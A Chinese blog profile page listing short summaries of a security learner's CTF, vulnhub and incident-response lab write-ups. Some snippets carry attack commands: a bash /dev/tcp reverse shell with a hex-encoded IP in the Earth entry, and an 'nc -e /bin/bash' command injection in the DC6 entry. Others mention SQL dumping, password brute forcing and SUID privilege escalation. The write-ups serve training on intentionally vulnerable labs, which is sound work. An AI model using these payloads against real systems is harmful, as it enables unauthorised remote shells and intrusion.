自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(25)
  • 收藏
  • 关注

原创 工具分享--IP与域名提取工具

最近在干活的时候发现一个小工具,用于提取防火墙、态感等设备日志中的恶意域名和IP地址,并且带有自动去重、一键去重等功能,极大程度上提高了工作效率,豪用!这是原文地址:https://mp.weixin.qq.com/s/irM4e7fcc-iiPRwfJ5lw_w下面是我改良之后的版本,新增了两个功能点1、处理模式分为两个:唯一IP模式:完全移除重复IP,仅保留出现一次的IP,这个可以用来对照防火墙实际封禁IP与每日记录的封禁名单有什么差别。传统去重模式:保留重复IP的一个实例。2、重复IP

2025-07-11 18:18:38 721

原创 第一届 “帕鲁杯“ --应急响应 [WriteUp]

环境中的每一台服务器都被攻击者攻破,不管是jumpserver的CVE-2024-29201,还是ZABBIX监控服务器的默认密码,还是PC02的钓鱼文件,或者是那一堆有1234!这里的登录是指登录上jumpserver,切换到审计台→日志审计→登录日志→时间筛选最近一年→筛选登录城市就可以找到了,因为他的登录城市是LAN,也就是通过内网登录。因为我的webserver是重置过密码的,所以参考14题题解,把/etc/shadow的文件提取出来,然后用kail中的john爆破,即可得到root密码。

2025-05-25 08:20:13 860

原创 阿里云ECS镜像下载并导入本地VMware虚拟机

原来是因为快照做得太多了,导致额度不够用了,但由于买的是大学牲99元的服务器,本来就没什么闲钱,所以只能忍痛删快照,但删着删着,突然想到,如果把快照保存下来放百度网盘,需要的时候再上传不就好了?注意:这个界面停留的时间比较短,错过了就得重启一下,可以先在启动的时候提前按键盘上的↑ 或 ↓ 键,这样界面会停留,就能很容易得选择了(一定选择最后一项,其他项会无法开机,别问我怎么知道的,因为我足足等了两个半钟)下载到本地后,开始解压,解压到后缀只剩raw为止。输入用户名密码,登录成功,至此导入成功。

2025-05-01 01:25:22 732

原创 应急响应靶机-WindowsServer2022-web1

再从Kuang.exe_extracted中找到Kuang.pyc文件,上传至Python在线反编译网站中就可看到,在py代码中,挖矿程序对矿池域名wakuang.zhigongshanfang.top发起请求。成功进入后访问了“/admin/plugin.php”等admin路径下的地址,其中多次看到了关键词:plugin(插件,插件功能一般都存在文件上传点)修复建议:更改网站管理员弱口令,对网站做防篡改保护,对后台做访问防护,让未授权人员不仅不能上传文件,还不能进入后台,这样就能大幅降低网站安全风险。

2025-09-07 13:51:48 784

原创 工具分享--IP与域名提取工具2.0

基于原版的基础上新增了一个功能点:IP-A段过滤,可以快速把内网192、170、10或者其它你想要过滤掉的IP-A段轻松去掉,提高你的干活效率!!!

2025-09-07 10:48:10 1041

原创 应急响应靶机-WindowsServer2022挖矿事件

一般来说挖矿程序的话,CPU、GPU、内存三者中就会有个使用率高的家伙,crtl+shift+esc打开任务管理器查看使用情况。回到任务管理器,右键XMRig miner,打开文件所在位置,可发现与程序存在同一目录下的config.json配置文件。win+r,然后输入eventvwr打开事件查看器,Windows日志–安全(查看安全日志)根据端口开放情况,可以判定攻击者对rdp端口进行暴力破解,因此攻击的端口为。没看见服务器部署WEB服务,可能是RDP远程登录进来的,那就看下日志。

2025-08-23 15:40:29 437

原创 BugKu-CTF-web-noteasytrick

注:掏了10金币买的原题作者写的WP,然后copy发的,没什么金币又解不出的bro可以看看这个😁

2025-08-19 11:43:43 198

原创 应急响应靶机 - easy溯源

在root目录下发现‘chuantou’文件夹(root密码zgsfsys,一登进去ls一下就看见了OVO),发现是内网穿透工具,在frpc.toml下发现攻击者服务器地址为。http://127.0.0.1:8080/ 访问看看,发现存在未授权访问漏洞,所以存在漏洞的服务就是Jenkins。登录进去后先使用history看一下历史命令,发现一段可疑编码带有’base64’关键词。经过解码后发现是一个反弹shell且为私网地址,因此可以判断这是跳板机IP地址。4、攻击者留下的flag(格式zgsf{})

2025-08-13 19:35:33 138

原创 BugKu-CTF-web-留言板1

公网服务器接收到的flag(之前看到一些师傅wp里用flask、XSS平台接收cookie,所以就光顾着纠结、烦恼flask、XSS平台没有接收到cookie,根本没想到nv -lvv 80 或者python3 -m http.server 80也能接收到flag…因为最近这道题解了好久,即网上和题目下方留言区都有wp链接和payload,但就是做不出,好痒啊~~后来通过虚心请教某师傅,终于得到解题方法,加上网上也没找到几篇像样的wp,所以就打算发一篇(其实是因为这题花了我好多金币,有点难受了)

2025-08-12 13:36:19 216

原创 应急响应靶机训练-近源OS-1

提到后门的话第一个想到的就是shift后门(连续点击shift键5次)六百六十六,煮播盐都不盐了:)其实是最近看HVV的面试题看到了这种后门,everything找到sethc.exe的路径,cmd计算MD5。设置好后,桌面就出现个lnk文件夹,点开看见个test.bat,把后缀改为.txt然后用记事本打开,就可以得到内网跳板IP地址。把上面的答案复制粘贴到"解题.exe"即可(不知道为啥虚拟机粘不上去,建议把"解题.exe"复制到物理机运行)点到这里,选择低一点的版本,我一般选15.x,点下一步。

2025-06-21 01:42:29 479

原创 vulnHub-Brainpan-1

用以上输出结果修改exploit.py脚本中的payload变量 并再次执行exploit.py脚本使目标程序崩溃,记录下Immunity Debugger中的esp address。构建exploit.py脚本,我们在exploit.py脚本中添加windows的IP,结合前面得到的能够使目标程序崩溃的offset值-524个字符大小,得到以下初始脚本。immunity debugger工具下载地址为:https://www.immunityinc.com/products/debugger/

2025-06-19 01:13:43 1962

原创 vulnhub-Matrix-Breakout 2 Morpheus

因为蚁剑的文件不是完整的,可能会有隐藏文件,做个反弹shell双管齐下(一句话需要魔改一下,弄上URL编码,干掉问号和空格和&)cat一下查看内容,结尾出现了一个名叫cypher-neo.png的图片。发现在graffiti.php的输入框输入内容后会保存到graffiti.txt文件中,先抓个包看看变量名。看看端口详细信息 nmap -A -T4 -p- 192.168.13.145。访问80端口,发现是个带着图片的界面,没有什么可以传参的地方。查看刚才提示里的图片,在网站上看不有啥,下载下来看看。

2025-06-17 21:49:49 884

原创 vulnhub-Web Machine-(N7)

只回显了一半FLAG,没头绪了,于是上网找一下WP看看,发现必须得扫出enter_network这个目录,没扫出来说明字典还不够强大…直接浏览本地文件,提交不能成功,检查网页源代码,发现目标地址是localhost,改为靶机IP后再次点击提交。访问http://192.168.56.102/enter_network/先抓个访问请求的包复制到txt文件中,然后使用命令先爆破库名。发现一个新页面/exploit.html,有个文件上传点。得到库名Machine,用该库名爆破表名。访问80端口,发现啥也没有。

2025-06-16 21:51:49 232

原创 vulnhub-Earth

在地球历史的前十亿年内,海洋中出现了生命,并开始影响地球的大气层和表面,导致厌氧生物的扩散,后来又出现了有氧生物。发现被禁止后就在网上查找了以下,发现通过将ip地址转换成16进制可以进行绕过:bash -i >& /dev/tcp/0xc0.0xa8.0x0d.0x81/4444 0>&1,kali端成功获取到shell权限。http://earth.local、https://earth.local和http://terratest.earth.local的扫描结果都是一样的。还是应该每周更换一次密钥?

2025-06-14 17:36:37 1975

原创 vulnhub-JANGOW

靶机下载地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova。浏览器去访问shell.php文件:http://192.168.56.101/site/shell.php。在/var/www/html/site/wordpress/目录发现config.php文件。使用蚁剑在/var/www/html/site/下面新建shell.php文件。点开是个空白页面,URL里的等于号后面是不是少了点什么,加上要执行的命令看看。然后访问site目录。

2025-06-12 14:55:47 1033

原创 vulnhub-Red

这是使用C语言写的代码,在文件所处位置的文件夹内还有一个rev的文件,这是经过supersecretfileuc.c编译完成后生成的程序,执行后会输出信息。将rev删除后会重新编译产生,并且是root权限,但没有权限更改文件内容,所以打算直接将这两个文件删掉,然后从新上传一个名为supersecretfileuc.c文件并在其中写入一个反弹shell的程序代码,这样只要supersecretfileuc.c文件被执行,root权限的shell就会被反弹到攻击机上。该集合包括了用于渗透的各种类型的列表。

2025-06-10 11:46:54 715

原创 vulnhub-DC9

回想到开始的端口扫描到了靶机运行了SSH服务,但状态是filtered,说明22端口的流量被过滤了,猜测可能存在knockd服务:即敲门端口服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,,使系统开启需要访问的服务端口,才能对外访问,不使用时,再使用自定义序列号来“关门”,将端口关闭,不对外监听。登录成功,转到root目录下,查看有没有关于flag的文件,通常情况下,flag都在root目录下,果然在这里。

2025-06-09 17:25:00 841

原创 vulnhub-DC8

并在kali开启http服务 service apache2 start,需要进入/tmp 路径下 (不然没有权限 就下载不了)然后给 一个权限:chmod 777 666.sh。nid=1 -D d7db -T users -C name,pass -dump #列出账号密码。使用find命令查找具有suid权限的命令,找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限。nid=1 -D d7db -T users --columns #列出字段。

2025-06-08 19:23:22 672

原创 vulnhub-DC7

Drush(Drush = Drupal + Shell)就是使用命令行命令来操作Drupal站点,它的命令格式与git类似,都是双字命令(drush + 实际的命令)。但是,使用Drush要远优于编写自己的脚本,好处在于,一是可以利用Drush开发社区的力量,二是Drush的命令更加可靠,适用于更多变的环境。现在可以对backups.sh文件进行修改了,可以把反弹shell写入sh文件中,因为sh文件是root执行的,所以返回的也是root权限。DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。

2025-06-07 13:21:37 858

原创 vulnhub-DC6

然后在上面输入127.0.0.1|nc -e /bin/bash 192.168.16.108 4444,但是发现长度不够长,看看用元素选择器能不能修改,长度,发现可以修改长度,这里就修改个500吧。登录成功,执行:sudo -l,在/home/jens目录下发现一个sh文件,如果以jens身份执行不需要密码。执行sudo -l命令,发现在jens的shell下,可以在不需要密码的情况下,以root的身份权限执行nmap。由于输入命令没有显示出来,只能盲敲,在/root目录下找到flag文件。

2025-06-06 11:26:57 708

原创 vulnhub-DC5

按照文件的说明,可分为三部分,将第一个框里内容保存为第一文件,名为libhax.c,然后使用黄色选取的命令编译,编译结束会生成libhax.so文件。打开这几个页面,发现发开footer.php时,不断刷新,图标也在不断地变化,确认文件包含页面是footer.php。第二个框里内容保存为rootshell.c文件,使用黄色选区的命令编译,编译结束后生成rootshell文件。这个时候可以把libhax.c和rootshell.c这两个文件删除 ,因为已经编译好了,留他们也没有用了。

2025-06-04 04:58:32 651

原创 vulnhub-DC4

sudo -l查看权限,发现可以不需要密码执行teehee(root权限),teehee可以来向其他文件写入内容。访问http://192.168.13.134/,使用bp爆破一下,这里密码薄采用kali路径下的。在/var/mail/下得到charles的密码 ^xHhA&hvim0y ,切换为charles。2.通过定时任务执行脚本提权,向/etc/crontab文件中写入新的定时任务。#如:admin❌0:0::/home/admin:/bin/bash。开放:80、22 端口。

2025-06-03 08:54:58 577

原创 vulnhub-DC3

就开了一个80端口,直接访问发现是Joomla 使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等。通过上面信息收集的基本信息我们可以 去发现漏洞 使用工具searchsploit 搜Joomla 的版本号即可。通过探测可以知道Joomla 的版本 3.7.0 以及CMS的后台地址/administrator/这里回显的是一个SQL注入的漏洞 根据这个思路可以对网页进行SQL注入的一些操作。然后用蚁剑连接shell(这里的url是haha.php的路径)

2025-06-03 06:21:11 596

原创 vulnhub-DC2

发现访问不了,且发现输入的ip地址自动转化为了域名,想到dc-2这个域名解析失败,需要更改hosts文件,添加一个ip域名指向。靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1。发现开放了80端口,存在web服务,Apache/2.4.10,添加完成后,再次访问,可以发现这是一个wordpress的站点。修改hosts文件,添加靶机IP到域名dc-2的指向。这里没有暗示,一,你现在只能靠自己了。

2025-05-31 23:42:03 1003

原创 vulnhub-DC1

发现有个叫flag4的账号,但是查看使用/etc/shadow失败,但是前面nmap扫描的时候发现了 ssh 服务,现在又发现了 flag4 用户,所以尝试使用hydra进行密码的暴力猜解。SUID可以让调用者以文件拥有者的身份运行该文件,所以利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么运行该文件的时候就得获得root用户的身份了。为结束标志的,所以这句命令后面的分号是不可缺少的,考虑到各个系统中分号会有不同的意义,所以在分号前面加反斜杠。它存储用户帐户信息。

2025-05-29 13:44:00 1559

和平精英灵敏度定制软件.apk

可以根据手机自身的配置给出建议的游戏灵敏度

2022-11-01

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除